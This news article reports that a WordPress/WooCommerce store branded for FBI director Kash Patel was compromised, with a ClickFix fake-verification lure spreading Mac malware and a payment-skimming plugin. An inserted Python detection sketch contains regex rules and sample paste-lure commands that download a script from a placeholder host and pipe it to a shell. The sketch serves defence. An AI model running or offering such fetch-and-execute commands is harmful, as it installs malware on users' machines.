FBI director’s personal website hacked and loaded with malware

https://www.escudodigital.com/en/cybersecurity/fbi-directors-personal-website-hacked-and-loaded-with-malware.html

Publish Date: 2026-05-26 01:15:00

Source Domain: www.escudodigital.com

An e-commerce website selling products under the brand of FBI director Kash Patel has been taken down after it was found to have been compromised by attackers and used to distribute malware to visitors.

The incident has been attributed to a campaign employing a social engineering technique known as ‘ClickFix’, where victims are tricked into executing the malicious code themselves.

The hackers managed to place a message that mimicked a legitimate security verification. Users were asked to copy a code and paste it into their computer terminal. Doing so ran a command that downloaded and installed malware on the device, particularly on Mac computers.

That screen made the user think they were solving an access issue or verifying they were not a bot, but in reality, it was leading them to manually execute a dangerous command in their terminal.

Once executed, the malicious tool could steal passwords stored in the browser, access system information, and send sensitive data to external servers, including in some cases credentials and possible cryptocurrency wallets. Afterwards, the program attempted to remove traces of its activity to make detection more difficult.
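A defender-side sketch of the pattern described above, as an added example that is not part of the original article: it flags text a web page asks a visitor to paste into a terminal when that text fetches or decodes content and hands it straight to an interpreter. The rule names, regexes and sample commands are assumptions constructed for illustration; the article does not publish the command used in this incident.

```python
import re

# Assumed heuristics for illustration; the article does not publish the
# command used in this incident. Each rule targets "fetch or decode, then
# hand straight to an interpreter", the core of a ClickFix paste lure.
INTERP = r"(?:sudo\s+)?(?:(?:ba|z)?sh|python3?|osascript)\b"
RULES = {
    "download_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*" + INTERP),
    "decode_piped_to_interpreter": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + INTERP),
    "interpreter_runs_download_substitution": re.compile(
        r"(?:(?:ba|z)?sh|eval)\s+(?:-c\s+)?[\"']?\$\(\s*(?:curl|wget)\b"),
}


def clickfix_indicators(pasted_text: str) -> list[str]:
    """Return the sorted names of the rules that match any line of the text."""
    hits = set()
    for line in pasted_text.splitlines():
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.add(name)
    return sorted(hits)


# Constructed sample inputs; example.invalid is a reserved name that never resolves.
SAMPLES = {
    "benign_install": "brew install wget",
    "fake_verification": "curl -fsSL https://example.invalid/verify.sh | bash",
    "encoded_stage": "echo 'Y29uc3RydWN0ZWQ=' | base64 -d | sh",
    "substitution": '/bin/bash -c "$(curl -fsSL https://example.invalid/check)"',
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label}: {clickfix_indicators(text) or 'no indicators'}")
```

A check like this fits in a site-integrity scan of rendered page text or in a review of commands users report being asked to run; a match is a reason to investigate, not proof of compromise.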

Once again due to a WordPress plugin

Investigations indicate that the website was compromised on several levels. On the one hand, a plugin had been used to steal users’ payment data. On the other, the page itself served as a vehicle to redirect users towards malware downloads.

The affected website was a store based on WordPress (with the WooCommerce plugin). This type of platform is very popular and, precisely for that reason, also a frequent target. The attackers not only compromised the visible part of the store but also some internal component, like a poorly maintained extension. From there, they managed to introduce the malicious code.

At this moment, Patel’s page remains inactive. Upon entering, a message indicates they will return soon. “We are making improvements to offer you a better service. The store will be back online shortly, more powerful than ever,” reads the text.
